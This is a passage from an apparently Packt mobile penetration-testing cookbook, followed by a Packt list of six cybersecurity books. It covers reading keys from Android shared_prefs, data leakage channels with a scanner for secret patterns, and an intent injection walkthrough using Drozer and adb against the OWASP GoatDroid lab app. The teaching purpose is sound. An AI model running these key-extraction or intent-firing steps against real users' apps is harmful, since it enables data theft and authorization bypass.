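import xml.etree.ElementTree as ET

# Hypothetical shared_prefs content, as pulled with something like:
#   adb pull /data/data/com.example.bank/shared_prefs/settings.xml
sample = """<?xml version='1.0' encoding='utf-8'?>
<map>
    <string name="username">alice</string>
    <string name="aes_key">0123456789abcdef0123456789abcdef</string>
</map>"""

def extract_strings(xml_text: str) -> dict:
    # Collect every <string> entry from the preferences file; key material
    # stored this way is readable in cleartext by anyone with the file.
    root = ET.fromstring(xml_text)
    return {el.get('name'): el.text for el in root.iter('string')}

secrets = extract_strings(sample)
print(secrets['aes_key'])  # the "strong" key, recovered without any effort
```

With the key in hand and the algorithm name recovered from the decompiled JAR, decrypting the protected data is mechanical.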
In our scenario, we could obtain the key and we knew the name of the encryption algorithm. This is enough to break a strong encryption implementation.

See also

http://www.paladion.net/index.php/mobile-phone-data-encryption-why-is-it-necessary/

Discovering data leakage sources

Data leakage risk worries organizations across the globe, and people have been implementing solutions to prevent data leakage. In the case of mobile applications, we first have to think about what the possible sources or channels of data leakage are. Once this is clear, devise or adopt a technique to uncover each of them.

Getting ready

As in other recipes, here also you need a bunch of applications (to be analyzed), an Android device or emulator, ADB, a DEX to JAR converter, Java decompilers, and WinRAR or WinZip.

How to do it...

To identify the data leakage sources, list down all the possible sources you can think of for the mobile application under audit. In general, all mobile applications have the following channels of potential data leakage:

Files stored locally
Client side source code
Mobile device logs
Web caches
Console messages
Keystrokes
Sensitive data sent over HTTP

How it works...

The next step is to uncover the data leakage vulnerability at these potential channels. Let us see the seven previously identified common channels:

Files stored locally: By this time, readers are very familiar with this. The data is stored locally in files such as shared preferences, XML files, SQLite DBs, and other files. In Android, these are located inside the application folder under the /data/data directory and can be read using tools such as ADB. In iOS, tools such as iExplorer or SSH can be used to read the application folder.

Client side source code: Mobile application source code is present locally on the mobile device itself. A common mistake is hardcoding sensitive data in the source code (either knowingly or unknowingly).
From the field, we came across an application that had hardcoded the connection key to the connected PoS terminal. Hardcoded formulas to calculate certain figures, which should ideally have been present in the server-side code, were found in the mobile app. Database instance names and credentials are also a possibility where the mobile app directly connects to a server datastore. In Android, the source code is quite easy to decompile via a two-step process: APK to DEX and DEX to JAR conversion. In iOS, the source code of header files can be decompiled up to a certain level using tools such as class-dump-z or otool. Once the raw source code is available, a static string search can be employed to discover sensitive data in the code.

Mobile device logs: All devices create local logs to store crash and other information, which can be used to debug or analyze a security violation. Poor coding may put sensitive data in local logs, and hence data can be leaked from here as well. The Android ADB command adb logcat can be used to read the logs on Android devices. If you use the same ADB command for the Vulnerable Bank application, you will notice the user credentials in the logs, as shown in the following screenshot:

Web caches: Web caches may also contain sensitive data related to the web components used in mobile apps. We discussed how to discover this in the WAP recipe earlier in this article.

Console messages: Console messages are used by developers to print messages to the console during application development and debugging. Console messages, if not turned off when launching the application (GO LIVE), may be another source of data leakage. Console messages can be checked by running the application in debug mode.

Keystrokes: Certain mobile platforms have been known to cache keystrokes. A malware or keystroke logger may take advantage of this and steal a user's keystrokes, hence making it another data leakage source.
Malware analysis needs to be performed to uncover embedded or pre-shipped malware or keystroke loggers within the application. Dynamic analysis also helps.

Sensitive data sent over HTTP: Applications either send sensitive data over HTTP or use a weak implementation of SSL. In either case, sensitive data leakage is possible. Usage of HTTP can be found via static analysis by searching for HTTP strings. Dynamic analysis to capture the packets at runtime also reveals whether the traffic goes over HTTP or HTTPS. There are various weak SSL implementations and downgrade attacks, which make data vulnerable to sniffing and hence to leakage.

There's more...

Data leakage sources can be vast, and listing all of them does not seem possible. Sometimes there are application- or platform-specific data leakage sources, which may call for a different kind of analysis.

Intent injection can be used to fire intents to access privileged contents. Such intents may steal protected data such as the personal information of all the patients in a hospital (under HIPAA compliance).

iOS screenshot backgrounding issues, where iOS applications store screenshots with populated user input data on the iPhone or iPad when the application enters the background. Imagine such screenshots containing a user's credit card details, CVV, expiry date, and so on, being found in an application under PCI DSS compliance.

Malware gives a totally different angle to data leakage.

Note that data leakage is a very big risk that organizations are tackling today. It is not just financial loss; losses may be intangible, such as reputation damage, or compliance or regulatory violations. Hence, it is very important to identify the maximum possible data leakage sources in the application and rectify the potential leakages.
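Both static searches suggested in this recipe, looking for hardcoded secrets and for cleartext http:// strings in the decompiled sources, are easy to script. A minimal sketch, with an illustrative rather than exhaustive pattern list:

```python
import os
import re

# Illustrative patterns only; extend both for real audits.
SECRET = re.compile(r'(password|secret|api[_-]?key|token)\s*[:=]', re.I)
CLEARTEXT_URL = re.compile(r'http://[^\s"\'<>]+')  # https:// is not flagged

def scan_sources(root_dir: str):
    """Walk decompiled sources and flag hardcoded secrets and http:// URLs."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.endswith(('.java', '.xml', '.smali')):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors='ignore') as fh:
                for lineno, line in enumerate(fh, 1):
                    if SECRET.search(line):
                        findings.append((path, lineno, 'secret', line.strip()))
                    for url in CLEARTEXT_URL.findall(line):
                        findings.append((path, lineno, 'cleartext-url', url))
    return findings
```

Point it at the decompiler output, for example `scan_sources('decompiled/')`, and manually review each hit; pattern lists like this produce false positives as well as misses.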
See also

https://www.owasp.org/index.php/Mobile_Top_10_2014-M4

Launching intent injection in Android

Other application-based attacks in mobile devices

When we talk about application-based attacks, the OWASP Top 10 risks are the first thing that comes to mind. OWASP (www.owasp.org) has a project dedicated to mobile security, which releases the Mobile Top 10. OWASP gathers data from industry experts and ranks the top 10 risks every three years. It is a very good knowledge base for mobile application security. Here is the latest Mobile Top 10, released in the year 2014:

M1: Weak Server Side Controls
M2: Insecure Data Storage
M3: Insufficient Transport Layer Protection
M4: Unintended Data Leakage
M5: Poor Authorization and Authentication
M6: Broken Cryptography
M7: Client Side Injection
M8: Security Decisions via Untrusted Inputs
M9: Improper Session Handling
M10: Lack of Binary Protections

Getting ready

Have a few applications ready to be analyzed, and use the same set of tools we have been discussing till now.

How to do it...

In this recipe, we restrict ourselves to other application-based attacks. The attacks we have not covered till now in this book are:

M1: Weak Server Side Controls
M5: Poor Authorization and Authentication
M8: Security Decisions via Untrusted Inputs
M9: Improper Session Handling

How it works...

For now, let us discuss the client-side or mobile-side issues for M5, M8, and M9.

M5: Poor Authorization and Authentication

A few common scenarios that can be attacked are:

Authentication implemented at the device level (for example, a PIN stored locally)
Authentication bound to poor parameters (such as UDID or IMEI numbers)
An authorization parameter responsible for access to protected application menus stored locally

These can be attacked by reading data using ADB, decompiling the applications and conducting static analysis on them, or by doing dynamic analysis on the outgoing traffic.

M8: Security Decisions via Untrusted Inputs

This one talks about IPC.
IPC entry points for applications to communicate with one another, such as Intents in Android or URL schemes in iOS, are vulnerable. If the origination source is not validated, the application can be attacked. Malicious intents can be fired to bypass authorization or steal data. We discuss this in further detail in the next recipe.

URL schemes are a way for applications to specify the launch of certain components. For example, the mailto scheme in iOS is used to create a new e-mail. If the applications fail to specify the acceptable sources, any malicious application will be able to send a mailto scheme to the victim application and create new e-mails.

M9: Improper Session Handling

From a purely mobile device perspective, session tokens stored in .db files, OAuth tokens, or access-granting strings stored in weakly protected files are vulnerable. These can be obtained by reading the local data folder using ADB.

See also

https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

Launching intent injection in Android

Android uses intents to request an action from another application component. A common communication is passing an Intent to start a service. We will exploit this fact via an intent injection attack. An intent injection attack works by injecting an intent into an application component to perform a task that is usually not allowed by the application workflow. For example, suppose an Android application has a login activity which, post successful authentication, gives you access to protected data via another activity. If an attacker can invoke that internal activity to access the protected data by passing an Intent, it is an intent injection attack.

Getting ready

Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and following the installation instructions mentioned in the User Guide. Install the Drozer Console Agent and start a session as mentioned in the User Guide.
If your installation is correct, you should get a Drozer command prompt (dz>).

How to do it...

You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application:

Start the OWASP GoatDroid FourGoats application in the emulator.
Browse the application to develop an understanding. Note that you are required to authenticate by providing a username and password, and post-authentication you can access the profile and other pages. Here is the pre-login screen you get:
Let us now use Drozer to analyze the activities of the FourGoats application. The following Drozer command is helpful:

run app.activity.info -a <package name>

Drozer detects four activities with null permission. Out of these four, ViewCheckin and ViewProfile are post-login activities.
Use Drozer to access these two activities directly via the following command:

run app.activity.start --component <package name> <activity name>

We chose to access the ViewProfile activity, and the entire sequence is shown in the following screenshot:
Drozer performs some actions and the protected user profile opens up in the emulator, as shown here:

How it works...

Drozer passed an Intent in the background to invoke the post-login activity ViewProfile. This resulted in the ViewProfile activity performing its action and displaying the profile screen. This way, an intent injection attack can be performed using the Drozer framework.

There's more...

Android also uses intents for starting a service or delivering a broadcast, so intent injection attacks can likewise be performed on services and broadcast receivers. The Drozer framework can also be used to launch attacks on these app components. Attackers may write their own attack scripts or use different frameworks to launch this attack.
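Outside Drozer, the same reconnaissance and attack can be sketched with stdlib Python plus a plain adb command. The manifest fragment, package, and activity names below are illustrative (modeled on FourGoats); verify them against your own build before firing anything:

```python
import xml.etree.ElementTree as ET

ANDROID = '{http://schemas.android.com/apk/res/android}'

# Hypothetical decoded manifest fragment (decode a real APK first,
# for example with apktool).
manifest = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <application>
    <activity android:name=".activities.ViewProfile" android:exported="true"/>
    <activity android:name=".activities.Login"/>
  </application>
</manifest>"""

def unprotected_activities(xml_text: str):
    """List activities reachable by other apps: exported or holding an
    intent filter, with no permission attribute protecting them."""
    risky = []
    for act in ET.fromstring(xml_text).iter('activity'):
        reachable = (act.get(ANDROID + 'exported') == 'true'
                     or act.find('intent-filter') is not None)
        if reachable and act.get(ANDROID + 'permission') is None:
            risky.append(act.get(ANDROID + 'name'))
    return risky

def am_start_cmd(package: str, activity: str):
    # Equivalent of Drozer's: run app.activity.start --component <pkg> <activity>
    return ['adb', 'shell', 'am', 'start', '-n', f'{package}/{activity}']

targets = unprotected_activities(manifest)
print(targets)  # ['.activities.ViewProfile']
cmd = am_start_cmd('org.owasp.goatdroid.fourgoats',
                   'org.owasp.goatdroid.fourgoats' + targets[0])
print(' '.join(cmd))
# Run cmd against a connected emulator to fire the intent, e.g.:
# import subprocess; subprocess.run(cmd, check=True)
```

This mirrors the Drozer walkthrough: static enumeration finds the activities with null permission, and `am start -n` fires the Intent that invokes one of them directly.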
See also

Using Drozer to find vulnerabilities in Android applications
https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf

Resources for Article:

Further resources on this subject:

Mobile Devices [article]
Development of Windows Mobile Applications (Part 1) [article]
Development of Windows Mobile Applications (Part 2) [article]
Expert Network
28 Jun 2021
7 min read

Top 6 Cybersecurity Books from Packt to Accelerate Your Career

With new technology threats, rising international tensions, and state-sponsored cyber-attacks, cybersecurity is more important than ever. In organizations worldwide, there is not only a dire need for cybersecurity analysts, engineers, and consultants, but senior management executives and leaders are also expected to be cognizant of the possible threats and of risk management. The era of cyberwarfare is now upon us. What we do now, and how we determine what we will do in the future, is the difference between whether our businesses live or die and whether our digital selves survive the digital battlefield.

In this article, we'll discuss 6 titles from Packt's bank of cybersecurity resources for everyone from an aspiring cybersecurity professional to an expert.

Adversarial Tradecraft in Cybersecurity

A comprehensive guide that helps you master cutting-edge techniques and countermeasures to protect your organization from live hackers. It enables you to leverage cyber deception in your operations to gain an edge over the competition.

Little has been written about how to act when live hackers attack your system and run amok. Even experienced hackers sometimes struggle when they realize the network defender has caught them and is zoning in on their implants in real time. This book provides tips and tricks all along the kill chain of an attack, showing where hackers can have the upper hand in a live conflict and how defenders can outsmart them in this adversarial game of computer cat and mouse.

This book contains two subsections in each chapter, specifically focusing on the offensive and defensive teams. Pentesters and red teamers, SOC analysts and incident responders, attackers, defenders, general hackers, advanced computer users, and security engineers should gain a lot from this book. This book will also be beneficial to those getting into purple teaming or adversarial simulations, as it includes processes for gaining an advantage over the other team.
The author, Dan Borges, is a passionate programmer and security researcher who has worked in security positions for companies such as Uber, Mandiant, and CrowdStrike. Dan has been programming various devices for more than 20 years, including over 14 years in the security industry.

Cybersecurity – Attack and Defense Strategies, Second Edition

A book that enables you to counter modern threats and employ state-of-the-art tools and techniques to protect your organization against cybercriminals. It is a completely revised new edition of the bestselling book, covering the very latest security threats and defense mechanisms, including a detailed overview of Cloud Security Posture Management (CSPM) and an assessment of the current threat landscape, with additional focus on new IoT threats and cryptomining.

This book is for IT professionals venturing into the IT security domain, IT pentesters, security consultants, or those looking to perform ethical hacking. Prior knowledge of penetration testing is beneficial.

This book is authored by Yuri Diogenes and Dr. Erdal Ozkaya. Yuri Diogenes is a professor at EC-Council University for their master's degree in cybersecurity and a Senior Program Manager at Microsoft for Azure Security Center. Dr. Erdal Ozkaya is a leading cybersecurity professional with business development, management, and academic skills who focuses on securing cyberspace and sharing his real-life skills as a security advisor, speaker, lecturer, and author.

Cyber Minds

This book comprises insights on cybersecurity across the cloud, data, artificial intelligence, blockchain, and IoT to keep you cyber safe. Shira Rubinoff's Cyber Minds brings together the top authorities in cybersecurity to discuss the emergent threats that face industries, societies, militaries, and governments today. Cyber Minds serves as a strategic briefing on cybersecurity and data safety, collecting expert insights from sector security leaders.
This book will help you to arm and inform yourself of what you need to know to keep your business – or your country – safe.  This book is essential reading for business leaders, the C-Suite, board members, IT decision-makers within an organization, and anyone with a responsibility for cybersecurity.  The author, Shira Rubinoff is a recognized cybersecurity executive, cybersecurity and blockchain advisor, global keynote speaker, and influencer who has built two cybersecurity product companies and led multiple women-in-technology efforts.  Cyber Warfare – Truth, Tactics, and Strategies  Cyber Warfare – Truth, Tactics, and Strategies is as real-life and up-to-date as cyber can possibly be, with examples of actual attacks and defense techniques, tools, and strategies presented for you to learn how to think about defending your own systems and data.  This book introduces you to strategic concepts and truths to help you and your organization survive on the battleground of cyber warfare. The book not only covers cyber warfare, but also looks at the political, cultural, and geographical influences that pertain to these attack methods and helps you understand the motivation and impacts that are likely in each scenario.  This book is for any engineer, leader, or professional with either responsibility for cybersecurity within their organizations, or an interest in working in this ever-growing field.  The author, Dr. Chase Cunningham holds a Ph.D. and M.S. in computer science from Colorado Technical University and a B.S. from American Military University focused on counter-terrorism operations in cyberspace.  Incident Response in the Age of Cloud  This book is a comprehensive guide for organizations on how to prepare for cyber-attacks and control cyber threats and network security breaches in a way that decreases damage, recovery time, and costs, facilitating the adaptation of existing strategies to cloud-based environments.  
It is aimed at first-time incident responders, cybersecurity enthusiasts who want to get into IR, and anyone who is responsible for maintaining business security. This book will also interest CIOs, CISOs, and members of IR, SOC, and CSIRT teams. However, IR is not just about information technology or security teams, and anyone with legal, HR, media, or other active business roles would benefit from this book.   The book assumes you have some admin experience. No prior DFIR experience is required. Some infosec knowledge will be a plus but isn’t mandatory.  The author, Dr. Erdal Ozkaya, is a technically sophisticated executive leader with a solid education and strong business acumen. Over the course of his progressive career, he has developed a keen aptitude for facilitating the integration of standard operating procedures that ensure the optimal functionality of all technical functions and systems.  Cybersecurity Threats, Malware Trends, and Strategies   This book trains you to mitigate exploits, malware, phishing, and other social engineering attacks. After scrutinizing numerous cybersecurity strategies, Microsoft's former Global Chief Security Advisor provides unique insights on the evolution of the threat landscape and how enterprises can address modern cybersecurity challenges.    The book will provide you with an evaluation of the various cybersecurity strategies that have ultimately failed over the past twenty years, along with one or two that have actually worked. It will help executives and security and compliance professionals understand how cloud computing is a game-changer for them.  
This book is designed to benefit senior management at commercial sector and public sector organizations, including Chief Information Security Officers (CISOs) and other senior managers of cybersecurity groups, Chief Information Officers (CIOs), Chief Technology Officers (CTOs), and senior IT managers who want to explore the entire spectrum of cybersecurity, from threat hunting and security risk management to malware analysis.  The author, Tim Rains worked at Microsoft for the better part of two decades where he held a number of roles including Global Chief Security Advisor, Director of Security, Identity and Enterprise Mobility, Director of Trustworthy Computing, and was a founding technical leader of Microsoft's customer-facing Security Incident Response team.  Summary  If you aspire to become a cybersecurity expert, any good study/reference material is as important as hands-on training and practical understanding. By choosing a suitable guide, one can drastically accelerate the learning graph and carve out one’s own successful career trajectory. 